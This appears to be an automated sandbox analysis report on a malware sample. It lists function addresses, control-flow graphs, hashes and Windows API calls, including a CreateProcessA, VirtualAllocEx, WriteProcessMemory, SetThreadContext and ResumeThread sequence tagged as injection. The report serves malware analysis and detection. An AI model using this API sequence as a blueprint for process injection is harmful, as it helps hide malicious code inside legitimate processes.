                                            control_flow_graph 373 275d371-275d378 374 275d334-275d36f 373->374 375 275d37a-275d40f GetCurrentProcess 373->375 384 275d411-275d417 375->384 385 275d418-275d44c GetCurrentThread 375->385 384->385 386 275d455-275d489 GetCurrentProcess 385->386 387 275d44e-275d454 385->387 390 275d492-275d4ad call 275d550 386->390 391 275d48b-275d491 386->391 387->386 394 275d4b3-275d4e2 GetCurrentThreadId 390->394 391->390 395 275d4e4-275d4ea 394->395 396 275d4eb-275d54d 394->396 395->396
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0275D3FE
                                            • GetCurrentThread.KERNEL32 ref: 0275D43B
                                            • GetCurrentProcess.KERNEL32 ref: 0275D478
                                            • GetCurrentThreadId.KERNEL32 ref: 0275D4D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: 4']q
                                            • API String ID: 2063062207-1259897404
                                            • Opcode ID: 6a4617779a5c5573e9ad63329e50f3acfa3b578f0f3c5257960165f4bc50cb19
                                            • Instruction ID: 6a5b4d51574846de8ea9a538afb3c8de9053d2bec10325169037f6876becfe49
                                            • Opcode Fuzzy Hash: 6a4617779a5c5573e9ad63329e50f3acfa3b578f0f3c5257960165f4bc50cb19
                                            • Instruction Fuzzy Hash: A0618AB49012099FDB14DFA9D548BAEFBF5FF48304F2084A9D409A73A0D774A948CF65
                                            Function 0275D380 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 403 275d380-275d40f GetCurrentProcess 407 275d411-275d417 403->407 408 275d418-275d44c GetCurrentThread 403->408 407->408 409 275d455-275d489 GetCurrentProcess 408->409 410 275d44e-275d454 408->410 412 275d492-275d4ad call 275d550 409->412 413 275d48b-275d491 409->413 410->409 416 275d4b3-275d4e2 GetCurrentThreadId 412->416 413->412 417 275d4e4-275d4ea 416->417 418 275d4eb-275d54d 416->418 417->418
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 0275D3FE
                                            • GetCurrentThread.KERNEL32 ref: 0275D43B
                                            • GetCurrentProcess.KERNEL32 ref: 0275D478
                                            • GetCurrentThreadId.KERNEL32 ref: 0275D4D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 4000a64823a2a5843df51a8b713848805074b5a84e58ff794c0f144c3fe9ce6a
                                            • Instruction ID: bf925f4ba25a00fbbb889c03d3a2acd327131fee824af5638cc4587a8a4c1f29
                                            • Opcode Fuzzy Hash: 4000a64823a2a5843df51a8b713848805074b5a84e58ff794c0f144c3fe9ce6a
                                            • Instruction Fuzzy Hash: 625168B49012099FDB14DFA9D548BAEFBF5EF48304F20C459D909A73A0D774A848CF65
                                            Function 06F87934 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 552 6f87934-6f879d5 555 6f87a0e-6f87a2e 552->555 556 6f879d7-6f879e1 552->556 563 6f87a30-6f87a3a 555->563 564 6f87a67-6f87a96 555->564 556->555 557 6f879e3-6f879e5 556->557 558 6f87a08-6f87a0b 557->558 559 6f879e7-6f879f1 557->559 558->555 561 6f879f3 559->561 562 6f879f5-6f87a04 559->562 561->562 562->562 565 6f87a06 562->565 563->564 566 6f87a3c-6f87a3e 563->566 570 6f87a98-6f87aa2 564->570 571 6f87acf-6f87b89 CreateProcessA 564->571 565->558 568 6f87a40-6f87a4a 566->568 569 6f87a61-6f87a64 566->569 572 6f87a4c 568->572 573 6f87a4e-6f87a5d 568->573 569->564 570->571 575 6f87aa4-6f87aa6 570->575 584 6f87b8b-6f87b91 571->584 585 6f87b92-6f87c18 571->585 572->573 573->573 574 6f87a5f 573->574 574->569 576 6f87aa8-6f87ab2 575->576 577 6f87ac9-6f87acc 575->577 579 6f87ab4 576->579 580 6f87ab6-6f87ac5 576->580 577->571 579->580 580->580 582 6f87ac7 580->582 582->577 584->585 595 6f87c28-6f87c2c 585->595 596 6f87c1a-6f87c1e 585->596 598 6f87c3c-6f87c40 595->598 599 6f87c2e-6f87c32 595->599 596->595 597 6f87c20 596->597 597->595 601 6f87c50-6f87c54 598->601 602 6f87c42-6f87c46 598->602 599->598 600 6f87c34 599->600 600->598 603 6f87c66-6f87c6d 601->603 604 6f87c56-6f87c5c 601->604 602->601 605 6f87c48 602->605 606 6f87c6f-6f87c7e 603->606 607 6f87c84 603->607 604->603 605->601 606->607 609 6f87c85 607->609 609->609
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F87B76
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 433195c2b6d77645770b2686b18cc37f94125f69853f069a19496766e1b6f228
                                            • Instruction ID: 1962def60b374cf39f1f1178d91a6be04156698883138f335d8bb5cd8128ac98
                                            • Opcode Fuzzy Hash: 433195c2b6d77645770b2686b18cc37f94125f69853f069a19496766e1b6f228
                                            • Instruction Fuzzy Hash: D7A17E71D00219CFDB61EF68C841BEDBBB2BF49304F1485AAD808A7290DB749A85CF91
                                            Function 06F87940 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 610 6f87940-6f879d5 612 6f87a0e-6f87a2e 610->612 613 6f879d7-6f879e1 610->613 620 6f87a30-6f87a3a 612->620 621 6f87a67-6f87a96 612->621 613->612 614 6f879e3-6f879e5 613->614 615 6f87a08-6f87a0b 614->615 616 6f879e7-6f879f1 614->616 615->612 618 6f879f3 616->618 619 6f879f5-6f87a04 616->619 618->619 619->619 622 6f87a06 619->622 620->621 623 6f87a3c-6f87a3e 620->623 627 6f87a98-6f87aa2 621->627 628 6f87acf-6f87b89 CreateProcessA 621->628 622->615 625 6f87a40-6f87a4a 623->625 626 6f87a61-6f87a64 623->626 629 6f87a4c 625->629 630 6f87a4e-6f87a5d 625->630 626->621 627->628 632 6f87aa4-6f87aa6 627->632 641 6f87b8b-6f87b91 628->641 642 6f87b92-6f87c18 628->642 629->630 630->630 631 6f87a5f 630->631 631->626 633 6f87aa8-6f87ab2 632->633 634 6f87ac9-6f87acc 632->634 636 6f87ab4 633->636 637 6f87ab6-6f87ac5 633->637 634->628 636->637 637->637 639 6f87ac7 637->639 639->634 641->642 652 6f87c28-6f87c2c 642->652 653 6f87c1a-6f87c1e 642->653 655 6f87c3c-6f87c40 652->655 656 6f87c2e-6f87c32 652->656 653->652 654 6f87c20 653->654 654->652 658 6f87c50-6f87c54 655->658 659 6f87c42-6f87c46 655->659 656->655 657 6f87c34 656->657 657->655 660 6f87c66-6f87c6d 658->660 661 6f87c56-6f87c5c 658->661 659->658 662 6f87c48 659->662 663 6f87c6f-6f87c7e 660->663 664 6f87c84 660->664 661->660 662->658 663->664 666 6f87c85 664->666 666->666
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F87B76
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: e3bdf905d5f4f5683f02f21f9e50882ec4ac539ba67ae468a46fd7a57fe349a1
                                            • Instruction ID: 6ac234d16b779af5e72df189790ddf77a8c2521e2838d8d9f1aceaab792abf55
                                            • Opcode Fuzzy Hash: e3bdf905d5f4f5683f02f21f9e50882ec4ac539ba67ae468a46fd7a57fe349a1
                                            • Instruction Fuzzy Hash: 11917E71D00219CFDF60EF68C840BEDBBB2BF49304F1485AAD808A7290DB749A85CF91
                                            Function 0275B0E8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 667 275b0e8-275b0f7 668 275b123-275b127 667->668 669 275b0f9-275b106 call 275ada0 667->669 671 275b129-275b133 668->671 672 275b13b-275b17c 668->672 676 275b11c 669->676 677 275b108 669->677 671->672 678 275b17e-275b186 672->678 679 275b189-275b197 672->679 676->668 725 275b10e call 275b370 677->725 726 275b10e call 275b380 677->726 678->679 680 275b199-275b19e 679->680 681 275b1bb-275b1bd 679->681 683 275b1a0-275b1a7 call 275adac 680->683 684 275b1a9 680->684 686 275b1c0-275b1c7 681->686 682 275b114-275b116 682->676 685 275b258-275b318 682->685 688 275b1ab-275b1b9 683->688 684->688 718 275b320-275b34b GetModuleHandleW 685->718 719 275b31a-275b31d 685->719 689 275b1d4-275b1db 686->689 690 275b1c9-275b1d1 686->690 688->686 691 275b1dd-275b1e5 689->691 692 275b1e8-275b1f1 call 275adbc 689->692 690->689 691->692 698 275b1f3-275b1fb 692->698 699 275b1fe-275b203 692->699 698->699 700 275b205-275b20c 699->700 701 275b221-275b225 699->701 700->701 703 275b20e-275b21e call 275adcc call 275addc 700->703 723 275b228 call 275b670 701->723 724 275b228 call 275b680 701->724 703->701 706 275b22b-275b22e 707 275b251-275b257 706->707 708 275b230-275b24e 706->708 708->707 720 275b354-275b368 718->720 721 275b34d-275b353 718->721 719->718 721->720 723->706 724->706 725->682 726->682
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275B33E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 879dd8e9369a9c6078698c1d1e09af4280a3ae46fbfdccf5bc4020bffbc4202c
                                            • Instruction ID: 5cf5a183757d06515b20f47493e48517550d60f0ff3c786137f161585ec000f6
                                            • Opcode Fuzzy Hash: 879dd8e9369a9c6078698c1d1e09af4280a3ae46fbfdccf5bc4020bffbc4202c
                                            • Instruction Fuzzy Hash: 1F714670A00B158FD764DF6AD44476ABBF1FF88308F108A2DD846D7A54DBB5E845CB90
                                            Function 0275590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 837 275590c-275597a 839 275597d-27559d9 CreateActCtxA 837->839 841 27559e2-2755a3c 839->841 842 27559db-27559e1 839->842 849 2755a3e-2755a41 841->849 850 2755a4b-2755a4f 841->850 842->841 849->850 851 2755a51-2755a5d 850->851 852 2755a60 850->852 851->852 854 2755a61 852->854 854->854
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 962065415e9e4cabf2ca042b3d770cf87cd7cae60ce910297cbc6a14e56f1954
                                            • Instruction ID: dfba3d7dc7ecda24b9c5acea3607d98ac84a78842642cd6d76b0fa7c0dee2bac
                                            • Opcode Fuzzy Hash: 962065415e9e4cabf2ca042b3d770cf87cd7cae60ce910297cbc6a14e56f1954
                                            • Instruction Fuzzy Hash: 2541F5B0C00719CFDB14DFA9C884A9EFBF5BF49304F60816AD409AB254D7755949CF91
                                            Function 02754514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 855 2754514-27559d9 CreateActCtxA 859 27559e2-2755a3c 855->859 860 27559db-27559e1 855->860 867 2755a3e-2755a41 859->867 868 2755a4b-2755a4f 859->868 860->859 867->868 869 2755a51-2755a5d 868->869 870 2755a60 868->870 869->870 872 2755a61 870->872 872->872
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 027559C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ff8c044f4f1dfa4c1ad2d4351590760c689710f63ed862cc4e6f10e71ff0182c
                                            • Instruction ID: d84cb4a4c69837ce292c0ca91f193fe5738fa04010f779b00fe5d05572a1e342
                                            • Opcode Fuzzy Hash: ff8c044f4f1dfa4c1ad2d4351590760c689710f63ed862cc4e6f10e71ff0182c
                                            • Instruction Fuzzy Hash: FA41F2B4C0061DCBDB24DFA9C844B9EFBB5BF48304F60806AD409AB255DBB56949CF90
                                            Function 02755A84 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4946654490d4762c0050904c3d37a94a6e310434b0e292d67e1db0e2b7a7e239
                                            • Instruction ID: 6886a4e8233c0ca342283ebfb7756a2b20e9b324032396e3c6c6683765d6f404
                                            • Opcode Fuzzy Hash: 4946654490d4762c0050904c3d37a94a6e310434b0e292d67e1db0e2b7a7e239
                                            • Instruction Fuzzy Hash: 02319AB5C04259CFDB11DFA8C85879EBFF1BF15308F54408AD805AB295D7B9990ACF41
                                            Function 06F876B0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87748
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 7072616c6ca571dafa3caf99968a746c803ba85f2ebb6e1bc953c940e80f0099
                                            • Instruction ID: 99e74036192d019d2268cff8948278f0ae88a5e0e44cbdc0adb3c71242aff0d2
                                            • Opcode Fuzzy Hash: 7072616c6ca571dafa3caf99968a746c803ba85f2ebb6e1bc953c940e80f0099
                                            • Instruction Fuzzy Hash: 002157B5D003099FCB10DFA9C981BEEBBF5FF48310F10882AE919A7240D7789941CBA0
                                            Function 06F876B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87748
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ab08b88c4958a0f5332154e5b2c7501e5e46066a8980e0df782f065be2f0f08c
                                            • Instruction ID: f6cd0fe29360336cdc37ecfa9ad08b71a1bb08fdc86ab5bf5dc4993c3af25ebc
                                            • Opcode Fuzzy Hash: ab08b88c4958a0f5332154e5b2c7501e5e46066a8980e0df782f065be2f0f08c
                                            • Instruction Fuzzy Hash: DE2136B5D003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7789944CBA4
                                            Function 06F877A1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87828
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 060898a054a30227da1ee424bb198ac71ef44aa2454b164f1b54de01e7c652d2
                                            • Instruction ID: fb1e895b3976352e173a0788fad79a6f58b75220646d261c1daa53b380d5813b
                                            • Opcode Fuzzy Hash: 060898a054a30227da1ee424bb198ac71ef44aa2454b164f1b54de01e7c652d2
                                            • Instruction Fuzzy Hash: AE2128B1C003499FCB10DFAAC840AEEFBF5FF48310F60842AE559A7250D7789540CBA1
                                            Function 06F870E1 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F87166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5c846337e537c8e439475620c89364ea123dfd24c149236e2e4153ddeb8d15a9
                                            • Instruction ID: 180aedf35bba1351949946ab2e2e9a1d99d58684c5c0ea3fcdf1c44f643bfe5a
                                            • Opcode Fuzzy Hash: 5c846337e537c8e439475620c89364ea123dfd24c149236e2e4153ddeb8d15a9
                                            • Instruction Fuzzy Hash: 81217971D002098FDB10EFAAC8847EEBBF5FF48350F108429D559A7240C7789A44CFA0
                                            Function 0275D5C1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D64F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: af86d5bafd23498ae3b9631963230babf1fd40d3c42d13078f4813f91ff8fb97
                                            • Instruction ID: 3faf9ca5388fc50cea4ba607d94520ebc54d84f1d8df2d845b450014548bb8eb
                                            • Opcode Fuzzy Hash: af86d5bafd23498ae3b9631963230babf1fd40d3c42d13078f4813f91ff8fb97
                                            • Instruction Fuzzy Hash: 0121E4B5D00248AFDB10CFAAD584ADEFBF8FB48310F14841AE918A3350D379A940CFA4
                                            Function 06F877A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87828
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: bf95118dc8764086fde2da999a283fde1aa2e87dc60c3740f30cdf8833943fde
                                            • Instruction ID: 19e3b89eb69405cf356aa696cd543a3eaaa2eb813d450fe5cb2f52215e5624d7
                                            • Opcode Fuzzy Hash: bf95118dc8764086fde2da999a283fde1aa2e87dc60c3740f30cdf8833943fde
                                            • Instruction Fuzzy Hash: A12139B1C003499FCB10DFAAC840AEEFBF5FF48310F208429E519A7250D7789540CBA1
                                            Function 06F870E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F87166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: ab718d3836d1830b5e2bc13994630151e478e8fed52b40305310918382406f66
                                            • Instruction ID: 1459944182fa8fcaeb8f3940760cdbd941ef5fc5b198a50ab6956a0438cc08cd
                                            • Opcode Fuzzy Hash: ab718d3836d1830b5e2bc13994630151e478e8fed52b40305310918382406f66
                                            • Instruction Fuzzy Hash: 1F214971D003098FDB10EFAAC8857EEBBF5EF48310F108429D519A7240DB789944CFA0
                                            Function 0275D5C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D64F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a73544ecf640ec04037fec72ccce6bd8b1f3c497b6362c77abbfef3152ee3743
                                            • Instruction ID: 2a8a4990d6920098900bfeaaa5ffa938d316c736064dd8b25463ac1b7a0225f0
                                            • Opcode Fuzzy Hash: a73544ecf640ec04037fec72ccce6bd8b1f3c497b6362c77abbfef3152ee3743
                                            • Instruction Fuzzy Hash: B221E2B59002489FDB10CFAAD984ADEFBF8FB48310F14801AE918A3350D378A940CFA4
                                            Function 06F875F1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87666
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 2f815d91cdba61c21e2eaa8111eeb36771eb24196ac9c3be3103454aa1950e9b
                                            • Instruction ID: 585c69dec1465fce1f28ab55d223629adc0f5b95ca918a4cfe53920e8633a7ed
                                            • Opcode Fuzzy Hash: 2f815d91cdba61c21e2eaa8111eeb36771eb24196ac9c3be3103454aa1950e9b
                                            • Instruction Fuzzy Hash: 30111775D002499FDB10DFAAC844ADFBBF5EF89710F208419E519A7250C775A540CFA0
                                            Function 06F875F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87666
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 5e57341bc08d211fef99a448d328fa45e32efc5ae03cc9aa3b5b04aff1c3921e
                                            • Instruction ID: 1c96474090ff42836510e6cb8de1ccf25fdea6f1e99ef899ad233640413d3adf
                                            • Opcode Fuzzy Hash: 5e57341bc08d211fef99a448d328fa45e32efc5ae03cc9aa3b5b04aff1c3921e
                                            • Instruction Fuzzy Hash: 661126758002499FCB10EFAAC844AEEBFF5EF49310F208419E519A7250C779A540CFA0
                                            Function 06F86BF8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 216585920d480ad9c7b3a6d1901634f0deeb3fef0a1f34978b93adb29347b0e2
                                            • Instruction ID: 1c7ae7fecdc2d74df3b4338ff6cdb426189f2fae078cbbb5b0f7df527b635360
                                            • Opcode Fuzzy Hash: 216585920d480ad9c7b3a6d1901634f0deeb3fef0a1f34978b93adb29347b0e2
                                            • Instruction Fuzzy Hash: DE1134B5D002488FDB20DFAAC5457EEBBF5EF48310F208819D519A7240C738A545CBA4
                                            Function 06F86C00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c62bc7f036d4ccb5315403389c31e2c0bade717b7f4b51e708cda65c40d54a5f
                                            • Instruction ID: 9af8e29166df21ad2c2c9cafce6913cddee7d3237b115ca8fc3a4b281ebfd1f7
                                            • Opcode Fuzzy Hash: c62bc7f036d4ccb5315403389c31e2c0bade717b7f4b51e708cda65c40d54a5f
                                            • Instruction Fuzzy Hash: E81125B1D002488FDB20DFAAC4457AEFBF5EF89724F208459D519A7240CB79A944CBA4
                                            Function 06F88C44 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8AB65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 557bf5b0d8ff480ed4445f931f76c960ad5462b130d41c7a4a02994ba525cd80
                                            • Instruction ID: 33209123c738d58bcbdcf4a3b77fee05006cf685aa782cbe9d55a9d169e7edac
                                            • Opcode Fuzzy Hash: 557bf5b0d8ff480ed4445f931f76c960ad5462b130d41c7a4a02994ba525cd80
                                            • Instruction Fuzzy Hash: 401103B580034CDFDB10DF9AD884BEEBBF8EB48310F10845AE518A7240D3B9A944CFA5
                                            Function 06F8AB00 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8AB65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 511ba79e0308be4d78df5ab5154ae97a5444be6203195cec95cbb39f2960a8b6
                                            • Instruction ID: 39303f043b3ba3ecdad62c7b80b775efc692f3fac86d12915900ded91f45cae2
                                            • Opcode Fuzzy Hash: 511ba79e0308be4d78df5ab5154ae97a5444be6203195cec95cbb39f2960a8b6
                                            • Instruction Fuzzy Hash: E31103B58002489FDB10DF99D985BDEBBF8EB48314F10845AE918A7240D379A944CFA5
                                            Function 0275B2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
